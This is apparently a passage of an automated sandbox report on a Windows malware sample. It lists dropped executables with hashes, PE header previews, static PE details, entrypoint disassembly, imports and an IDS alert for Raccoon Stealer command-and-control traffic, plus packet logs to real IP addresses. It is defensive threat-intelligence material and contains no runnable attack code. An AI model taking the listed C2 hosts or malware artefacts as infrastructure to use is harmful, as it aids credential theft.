                                                                                                                                                                                                  SSDEEP:49152:BpaPwRrdA+QcpPQYNWcEp4PdznZmkLV/RycGQzNDNui0G:naPp+3pPQQ8+rzFtNuY
                                                                                                                                                                                                  MD5:F853FE6B26DCF67545675AEC618F3A99
                                                                                                                                                                                                  SHA1:A70F5FFD6DAC789909CCB19DFB31272A520C7BC0
                                                                                                                                                                                                  SHA-256:091BA447AF0F0CABD66484B3F81E909CA01BE4E27DB9CCF42779174E04DAD57A
                                                                                                                                                                                                  SHA-512:4764E88D5BDCF88447E0782C88FEC18F5A1083B460829E16635A8602173F1A6813D3FF93866BEF587F9F9B682451D4386BD765B2DA580C69F7483B48F074BBD3
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e...............0..<...V......X+9.. ...`....@.. ........................a.......*...@.................................:...P.....U.C.............*............................................................................................. .@... ...................... ..` g...`...<..................@..@ ............................@..@.idata... ..........................@....themida..2.. ......................`....boot....<... 9..<..................`..`MSI GF65P....`U..................... ..`MSI GF65P.....U......".............. ..`.rsrc...C.....U......0..............@..@........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CEB6.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3455664
                                                                                                                                                                                                  Entropy (8bit):6.441059558704059
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:2k50a1yGMilKK4s2U4GaS0d2J42c3F2QYZbRQ:30cwilB4s2fGaSs2J4l3Qt7Q
                                                                                                                                                                                                  MD5:8E50D7FBCC07F331637ABBAA2C6ED428
                                                                                                                                                                                                  SHA1:7A9E775ADDA81B2A47E8A7B453F6C480476FB17A
                                                                                                                                                                                                  SHA-256:AA431518B3EB9FDA6C05801B17B6A11880A4143C3B1B405154140C190772BF0A
                                                                                                                                                                                                  SHA-512:33E6E79D4772C39D79AEF8458FEFC06B717326D328275D3B2D0D2F0A348AAED12E711B2EB46AC7FF84D74C634963E35D016363734442A9118251029EDCFEE24C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L.................0.............n.... ...@....@.. ........................;.....".4...@.................................:@..P.....;.S1............4..8.......................................................................................... . ... ...~.................. ..` .....@......................@..@ ..... .......4..............@..@.idata... ...@.......6..............@...Intel Co. ...`.......8..............@..@.themida..2.......2..B..............`...Intel CoP.....;......B4............. ..`.rsrc...S1....;..2...P4.............@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\E52D.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):137216
                                                                                                                                                                                                  Entropy (8bit):6.81103188382168
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YGAF8W9CjQE5RA4Mk5PGVze5NVh7O0Oyz:YGvWSQtkBGV2VjOc
                                                                                                                                                                                                  MD5:D0F8625E7557AE3CCC13440F3843515F
                                                                                                                                                                                                  SHA1:81A56C0468A80228190B001A49C6DA67D90ECC63
                                                                                                                                                                                                  SHA-256:ECB40D6A2531A019EE02585E66982606C2DF2083462774198715388BCBB48D12
                                                                                                                                                                                                  SHA-512:1A0370A18F5600B65251CF3EB6FA7921F6DB3EE12EA83794D6C6E3AF19ED517593E3A529299741BB53999C51B09BB50070A0642B3E747340AB7A882A39C9307D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......_.....................f......B.............@.................................`a..............................`B..T....9..<...................................................................0%..@...............|............................text...P........................... ..`.rdata...2.......4..................@..@.data...|U...P.......4..............@....rsrc................R..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\FE25.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):4745728
                                                                                                                                                                                                  Entropy (8bit):7.889408291592824
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:2b0YmXyYfLYaoZedg+4lOhyS0fOuFqC6Ws2HRvu:+miYTerFO/PuFjJsSG
                                                                                                                                                                                                  MD5:CDDB8954B4839E0106963B050ED664EB
                                                                                                                                                                                                  SHA1:21ACB70C67A94DD6D8CFE8EF43F7FFD48D47FD17
                                                                                                                                                                                                  SHA-256:BE6C2FF9EE6768B86F8C6E5E3138D61D0B0F47C5D1D28B3EBC423EA37420DDB3
                                                                                                                                                                                                  SHA-512:8AD60BDD5C8E4B91D663FE8E936C2B9BF57BB5614B4AE9556BF1BBF238CA5909D7500ADCD5E6E773D534EB87F88E58C124E627F743CFC1AE12175EDBCBF862A8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7a.....................|........]...........@..........................0y......UI...@.................................xB9.|.....u.....................pu......................................]u.@.............h..............................text...C........................... ..`.rdata..B...........................@..@.data....T...p......................@...RAM 8GB ............................`..`RAM 8GB S.'.........................`..`RAM 8GB 0.D...0...D.................`..`.reloc.......pu.......D.............@..@.rsrc........u.......D.............@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\ecrjwib
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                  Entropy (8bit):6.736702902065376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:jLOCZw1YLUlP7fXadkUQ0+78Au2SRjj/WgmO/Z/eh3uJp+Q7Jgz70eIacRbUozsz:jnwcUNPfjQv5/Z0qfPeZcRwKsz
                                                                                                                                                                                                  MD5:FB45ECBFB0E13B103B6B1C583479A21D
                                                                                                                                                                                                  SHA1:9CB9EEAD55F3B3F4847FD8F1BDD8D20CA46D9DC2
                                                                                                                                                                                                  SHA-256:D0426ED95048EC08395EDDDAAA1D3CCC7A3F769D4324195E1F075B16F462A4C6
                                                                                                                                                                                                  SHA-512:1969648CB590E6C71FCF0391003CE56D22472F01105D9E3FAB9E3ACBACB687DDE8CF0CA01C26B862EE7CF582D8B5605B91B82011F9CC061E3500EF8390570889
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L.....O_.....................H......,........ ....@..........................p.......(...............................Q..T...,I..<...................................!...............................4..@............ ..|............................text............................... ..`.rdata...1... ...2..................@..@.data...|U...`.......8..............@....rsrc...............V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\ecrjwib:Zone.Identifier
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):6.736702902065376
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                  • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                  File name:pAWNholT8X.exe
                                                                                                                                                                                                  File size:131072
                                                                                                                                                                                                  MD5:fb45ecbfb0e13b103b6b1c583479a21d
                                                                                                                                                                                                  SHA1:9cb9eead55f3b3f4847fd8f1bdd8d20ca46d9dc2
                                                                                                                                                                                                  SHA256:d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6
                                                                                                                                                                                                  SHA512:1969648cb590e6c71fcf0391003ce56d22472f01105d9e3fab9e3acbacb687dde8cf0ca01c26b862ee7cf582d8b5605b91b82011f9cc061e3500ef8390570889
                                                                                                                                                                                                  SSDEEP:1536:jLOCZw1YLUlP7fXadkUQ0+78Au2SRjj/WgmO/Z/eh3uJp+Q7Jgz70eIacRbUozsz:jnwcUNPfjQv5/Z0qfPeZcRwKsz
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:e0e4e8beb0e4c8ea

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x401b2c
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                  Time Stamp:0x5F4F9DAD [Wed Sep 2 13:27:09 2020 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                  Import Hash:f98cc9327e2d65cc6189a693f26e1c1d

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  call 00007F3290BE146Ch
                                                                                                                                                                                                  jmp 00007F3290BDE87Dh
                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                  cmp eax, dword ptr [00416008h+ecx*8]
                                                                                                                                                                                                  je 00007F3290BDEA15h
                                                                                                                                                                                                  inc ecx
                                                                                                                                                                                                  cmp ecx, 2Dh
                                                                                                                                                                                                  jc 00007F3290BDE9F3h
                                                                                                                                                                                                  lea ecx, dword ptr [eax-13h]
                                                                                                                                                                                                  cmp ecx, 11h
                                                                                                                                                                                                  jnbe 00007F3290BDEA10h
                                                                                                                                                                                                  push 0000000Dh
                                                                                                                                                                                                  pop eax
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  mov eax, dword ptr [0041600Ch+ecx*8]
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  add eax, FFFFFF44h
                                                                                                                                                                                                  push 0000000Eh
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  cmp ecx, eax
                                                                                                                                                                                                  sbb eax, eax
                                                                                                                                                                                                  and eax, ecx
                                                                                                                                                                                                  add eax, 08h
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  call 00007F3290BE10D1h
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  jne 00007F3290BDEA08h
                                                                                                                                                                                                  mov eax, 00416170h
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  add eax, 08h
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  call 00007F3290BE10BEh
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  jne 00007F3290BDEA08h
                                                                                                                                                                                                  mov eax, 00416174h
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  add eax, 0Ch
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  call 00007F3290BDE9E7h
                                                                                                                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                  push ecx
                                                                                                                                                                                                  mov dword ptr [eax], ecx
                                                                                                                                                                                                  call 00007F3290BDE987h
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                  call 00007F3290BDE9C1h
                                                                                                                                                                                                  mov dword ptr [eax], esi
                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  push 0000000Ch
                                                                                                                                                                                                  push 004145D8h
                                                                                                                                                                                                  call 00007F3290BDF78Ch
                                                                                                                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                  xor edi, edi
                                                                                                                                                                                                  cmp ecx, edi
                                                                                                                                                                                                  jbe 00007F3290BDEA30h
                                                                                                                                                                                                  push FFFFFFE0h
                                                                                                                                                                                                  pop eax
                                                                                                                                                                                                  xor edx, edx
                                                                                                                                                                                                  div ecx
                                                                                                                                                                                                  cmp eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                  sbb eax, eax
                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                  jne 00007F3290BDEA21h
                                                                                                                                                                                                  call 00007F3290BDE993h
                                                                                                                                                                                                  mov dword ptr [eax], 0000000Ch
                                                                                                                                                                                                  push edi
                                                                                                                                                                                                  push edi
                                                                                                                                                                                                  push edi

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x151a00x54.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1492c0x3c.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000xa8f0.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x121c00x1c.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x134800x40.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x120000x17c.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x100800x10200False0.800932655039data7.5513445643IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rdata0x120000x31f40x3200False0.25703125data4.15966796055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0x160000x8557c0x1e00False0.118489583333data1.32605149668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rsrc0x9c0000xa8f00xaa00False0.668795955882data6.07261172713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Resources

                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                  RT_ICON0x9c3f00xea8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x9d2980x8a8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x9db400x6c8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x9e2080x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x9e7700x25a8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa0d180x10a8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa1dc00x988dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa27480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa2c280x6c8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa32f00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa38580x25a8dataEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xa5e000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                  RT_STRING0xa64c80x424data
                                                                                                                                                                                                  RT_ACCELERATOR0xa62a80x50data
                                                                                                                                                                                                  RT_ACCELERATOR0xa62f80x20data
                                                                                                                                                                                                  RT_GROUP_ICON0xa62680x3edataEnglishUnited States
                                                                                                                                                                                                  RT_GROUP_ICON0xa2bb00x76dataEnglishUnited States
                                                                                                                                                                                                  RT_VERSION0xa63180x1b0data

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  KERNEL32.dllHeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA
                                                                                                                                                                                                  USER32.dllGetCursorPos

                                                                                                                                                                                                  Exports

                                                                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                                                                  @SetViceVariants@1210x401000

                                                                                                                                                                                                  Version Infos

                                                                                                                                                                                                  DescriptionData
                                                                                                                                                                                                  InternalNamesajbmiamezu.ise
                                                                                                                                                                                                  ProductVersion8.64.59.5
                                                                                                                                                                                                  CopyrightCopyrighz (C) 2021, fudkagat
                                                                                                                                                                                                  Translation0x0127 0x0081

                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  09/27/21-19:34:17.246697ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                                                                                                                  09/27/21-19:34:19.201894ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                                                                                                                  09/27/21-19:35:20.921103TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4984380192.168.2.6194.180.174.100

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.224266052 CEST4976780192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.279947042 CEST8049767194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.280124903 CEST4976780192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.312551022 CEST4976780192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.312578917 CEST4976780192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.367580891 CEST8049767194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.468553066 CEST8049767194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.468585968 CEST8049767194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.468770981 CEST4976780192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.884759903 CEST4976780192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.939538956 CEST8049767194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:18.964823961 CEST4976880192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.019593000 CEST8049768194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.019771099 CEST4976880192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.019926071 CEST4976880192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.019937038 CEST4976880192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.074320078 CEST8049768194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.167814016 CEST8049768194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.170336962 CEST4976880192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.170663118 CEST4976880192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:19.225172997 CEST8049768194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.563977003 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.619335890 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.619455099 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.619575977 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.716785908 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746572018 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746607065 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746624947 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746639967 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746658087 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746675014 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746695042 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746733904 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746740103 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746741056 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746761084 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746807098 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746840000 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746859074 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.746901989 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801520109 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801548004 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801567078 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801575899 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801589012 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801601887 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801635981 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801650047 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801661968 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801776886 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801795959 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801871061 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801889896 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801903963 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801915884 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801928997 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.801975965 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.802026987 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.802040100 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.802131891 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.803356886 CEST4977180192.168.2.6194.147.85.186
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858133078 CEST8049771194.147.85.186192.168.2.6
                                                                                                                                                                                                  Sep 27, 2021 19:34:20.858170986 CEST8049771194.147.85.186192.168.2.6
